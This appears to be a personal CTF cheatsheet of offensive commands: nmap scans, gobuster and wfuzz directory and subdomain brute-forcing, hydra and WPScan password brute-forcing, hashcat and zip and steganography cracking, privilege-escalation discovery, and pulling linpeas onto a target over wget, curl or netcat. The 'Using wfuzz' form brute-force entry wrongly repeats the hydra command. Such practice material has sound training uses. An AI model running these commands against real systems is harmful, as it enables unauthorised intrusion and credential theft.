Use these cheatsheets to increase your CTF speed.
This cheatsheet contains essential commands I always use in CTFs, THM boxes, and in cybersecurity. Includes commands and tools for discovery to transferring files, passing by web tools, and cracking. I encourage the other content creators to replicate this kind of cheatsheet on their platform (a mention will always be appreciated 😊).
Discovery
Nmap
Basic nmap scan:
nmap -vv -sC -sV -oN nmap.log $IPComplete nmap scan:
nmap -vv -A -p- -oN nmap-complete.log $IPSee my nmap cheatsheet for other personal favorites.
Web Directory and Query Parameters Bruteforce
Using gobuster:
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.log -t 200 -u $URLUsing wfuzz:
wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/FUZZUsing wfuzz to bruteforce query parameters:
wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/?parameter=FUZZRecursive directory scan with wfuzz:
wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 200 --hc 404 -R $DEPTH http://www.host.name/FUZZWeb
HTTP Form Bruteforce
Using Hydra:
hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"Using wfuzz:
hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"Wordpress
WPScan + password bruteforce:
wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt --usernames usernames.txtSubdomain Bruteforce
Using wfuzz:
wfuzz -c -f wfuzz-sub.log -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u $URL -H "Host: FUZZ.host.name" -t 32 --hc 200 --hw 356Note: you will need to adjust the --hc and --hw parameters to your needs. Check wfuzz -h for more information about those.
Using gobuster:
gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL -t 32Cracking
ZIP
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zipHashes
Using hashcat:
hashcat -m $MODE hashes /usr/share/wordlists/rockyou.txtBruteforce SSH
Using hydra:
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 sshSteganography
Crack steghide passphrase using stegracker: Install:
pip3 install stegcrackerRun:
python3 -m stegcracker tocrack.jpgPrivescs Discovery
Find privescs exploiting SUID binaries:
find / -perm -u=s -type f 2>/dev/nullFind privescs by listing sudo permissions:
sudo -lEnumerate interesting files, processes, and privescs using Linpeas:
- Install linpeas on your machine.
- Transfer it to the target machine. (see the Transferring Files)
- Make it executable, run it, and
teethe output to a log file for further analysis.
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.logTransferring Files
Open an HTTP server:
cdinto the directory you want to access one or more files from.- Open an HTTP server:
# PYTHON3
python3 -m http.server -b $IP $PORT# PHP
php -S $IP:$PORT- Access the file:
# Wget
wget http://$IP:$PORT/file# Curl
curl http://$IP:$PORT/file -o target_file# Netcat
nc $IP $PORT > target_fileUsing SCP:
# Send
scp /path/to/file user@$HOST:/path/# Send with custom name
scp /path/to/file user@$HOST:/path/different_name# Get
scp user@$HOST:/path/to/file /local/directoryNote: To connect with an SSH key, you may need to use the -i flag followed by the path to the key.
Using netcat:
# Server
nc -lp $PORT < file# Client
nc $IP $PORT > file
